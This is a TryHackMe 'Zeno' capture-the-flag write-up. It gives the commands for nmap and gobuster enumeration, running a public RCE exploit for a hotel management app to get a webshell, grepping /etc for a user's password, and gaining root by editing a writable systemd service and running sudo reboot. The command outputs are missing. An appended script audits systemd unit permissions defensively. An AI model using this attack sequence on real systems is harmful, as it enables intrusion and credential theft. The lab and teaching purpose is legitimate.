TryHackMe Zeno Writeup / Linux-Lab / OSCP

nr_4x4

Step 1: Port overview

Command:

nmap -vv -p- -T5 -Pn 10.10.228.41 -oN open_ports

Get:

Command:

sudo nmap -O -sV -sC -p 22,12340 10.10.228.41 -oN nmap_scan

Get:

Step 2: Check port 12340

Enumerate http://10.10.228.41:12340

Command:

gobuster dir -u http://10.10.228.41:12340 -w '/wordlists/dirb/big.txt' -x txt,php,html -t 80

Get:

Step 3: Exploit

Google “Pathfinder Hotel exploit”

Get:

Code without syntax errors:

Command:

python2 rms-rce.py http://10.10.228.41:12340/rms/

Get:

Trigger WebShell:

Get Shell:

Step 4: Enumerate the server

Command:

find / -user edward 2>/dev/null

Get:

We have “zeno” in “/var/spool/mail”

Search for “zeno”

Command:

grep -r -i zeno /etc 2>/dev/null -A 2 -B 2

Get:

We have the password for Edward

Step 5: PrivEsc

Command:

sudo -l

Get:

Being allowed to run “reboot” with sudo is not helpful on its own, but it becomes useful in combination with a writable system file that is processed at boot

Command:

find /etc -writable 2>/dev/null

Get:

Exploit “/etc/systemd/system/zeno-monitoring.service”

Command:

cat /etc/systemd/system/zeno-monitoring.service

Get:

Manipulate “/etc/systemd/system/zeno-monitoring.service”

Command:

sudo /usr/sbin/reboot

Wait 2–3 minutes
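
For the defender's side of Step 5, the following added example (not part of the original writeup) audits a systemd unit directory for unit files, drop-in files and directories that are not owned by root or are group- or world-writable, which is the condition that makes a sudo-permitted reboot dangerous. The function name audit_units and its output format are made up for this example, and it assumes GNU or BusyBox find and stat.

```sh
#!/bin/sh
# Added example (not from the writeup): audit systemd unit locations for the
# weakness abused in Step 5. Function name and output format are hypothetical.
# Assumes GNU or BusyBox find/stat (find -L, stat -c).

# audit_units DIR [OWNER_UID]
# Prints "OWNER <mode> <uid> <path>" for entries not owned by OWNER_UID (default 0)
# and "WRITABLE <mode> <uid> <path>" for entries with group/other write bits.
# Covers unit files, drop-in *.conf files and the directories that hold them,
# because write access to a directory allows replacing the files inside it.
audit_units() (
    dir=$1
    owner=${2:-0}
    [ -d "$dir" ] || exit 0
    # -L resolves symlinked units to their targets; "-type f" then skips
    # masked units (symlinks to /dev/null) and dangling links.
    find -L "$dir" \( -type d -o -type f \( -name '*.service' -o -name '*.timer' \
            -o -name '*.socket' -o -name '*.path' -o -name '*.conf' \) \) \
        -exec stat -L -c '%a %u %n' {} + 2>/dev/null |
    while read -r mode uid path; do
        [ "$uid" -eq "$owner" ] || echo "OWNER $mode $uid $path"
        # 022 = write bit for group and for others (octal).
        [ $(( 0$mode & 022 )) -eq 0 ] || echo "WRITABLE $mode $uid $path"
    done
)

# Default to the directory from Step 5 when no arguments are given.
[ "$#" -gt 0 ] || set -- /etc/systemd/system
for d in "$@"; do
    audit_units "$d"
done
```

Mode bits do not reflect POSIX ACLs, so a clean result should be confirmed with getfacl on systems where ACLs are in use.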

Link to Try Hack Me: https://tryhackme.com

Link to challenge: https://tryhackme.com/r/room/zeno
